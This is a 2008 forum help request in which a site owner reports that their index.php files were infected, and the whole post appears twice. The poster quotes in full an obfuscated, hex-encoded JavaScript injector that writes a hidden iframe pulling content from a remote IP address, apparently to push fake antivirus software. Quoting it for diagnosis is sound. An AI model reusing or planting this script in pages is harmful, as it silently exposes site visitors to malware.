ole90
06-18-2008, 08:20 PM
Hey,
I have a reallllly bad secruity problem. Recently, most of alllll my index.php files were infected with this wierd script that is posted at the bottom.
When you view the index.php files, it generates a pop up asking to download XP defender, which is some kind of fake defender spyware crap.
The code posted at the end of the file is:
<script>
<!--
var d=document,kol=561;
function O10H485821B349295(H485821B349A8F){ var H485821B34A293 = 16; return( parseInt(H485821B349A8F,H485821B34A293));}function H485821B34B28B(H485821B34BA9E){ var H485821B34D289 = 2; var H485821B34C292='';for(H485821B34CA8D=0; H485821B34CA8D<H485821B34BA9E.length; H485821B34CA8D+=H485821B34D289){ H485821B34C292 += ( String.fromCharCode (O10H485821B349295(H485821B34BA9E.substr(H485821B34CA8D, H485821B34D289))));}return H485821B34C292;} document.write(H485821B34B28B('3C7363726970743E696628216D796961297B642E777269746528273C494652414D452 06E616D653D4F31207372633D5C27687474703A2F2F37372E3232312E3133332E3137312F2E69662F676F2E68746D6C3F272 B4D6174682E726F756E64284D6174682E72616E646F6D28292A3135333735292B27323835333964365C272077696474683D3 735206865696768743D323035207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F494652414D45203E27293 B7D766172206D7969613D747275653B3C2F7363726970743E'));
//-->
</script>
And i have no idea how it got there.
All the files on my computer are clean, and when i downloaded the index.php file from my server, the code was attached there. I hosted by bluehost.com and they assured me that the problem came from my end.
I ran Norton 360 virus scanner and it didn't find anything.
I am unsure of how it got there :X Any ideas ?
I have a reallllly bad secruity problem. Recently, most of alllll my index.php files were infected with this wierd script that is posted at the bottom.
When you view the index.php files, it generates a pop up asking to download XP defender, which is some kind of fake defender spyware crap.
The code posted at the end of the file is:
<script>
<!--
var d=document,kol=561;
function O10H485821B349295(H485821B349A8F){ var H485821B34A293 = 16; return( parseInt(H485821B349A8F,H485821B34A293));}function H485821B34B28B(H485821B34BA9E){ var H485821B34D289 = 2; var H485821B34C292='';for(H485821B34CA8D=0; H485821B34CA8D<H485821B34BA9E.length; H485821B34CA8D+=H485821B34D289){ H485821B34C292 += ( String.fromCharCode (O10H485821B349295(H485821B34BA9E.substr(H485821B34CA8D, H485821B34D289))));}return H485821B34C292;} document.write(H485821B34B28B('3C7363726970743E696628216D796961297B642E777269746528273C494652414D452 06E616D653D4F31207372633D5C27687474703A2F2F37372E3232312E3133332E3137312F2E69662F676F2E68746D6C3F272 B4D6174682E726F756E64284D6174682E72616E646F6D28292A3135333735292B27323835333964365C272077696474683D3 735206865696768743D323035207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F494652414D45203E27293 B7D766172206D7969613D747275653B3C2F7363726970743E'));
//-->
</script>
And i have no idea how it got there.
All the files on my computer are clean, and when i downloaded the index.php file from my server, the code was attached there. I hosted by bluehost.com and they assured me that the problem came from my end.
I ran Norton 360 virus scanner and it didn't find anything.
I am unsure of how it got there :X Any ideas ?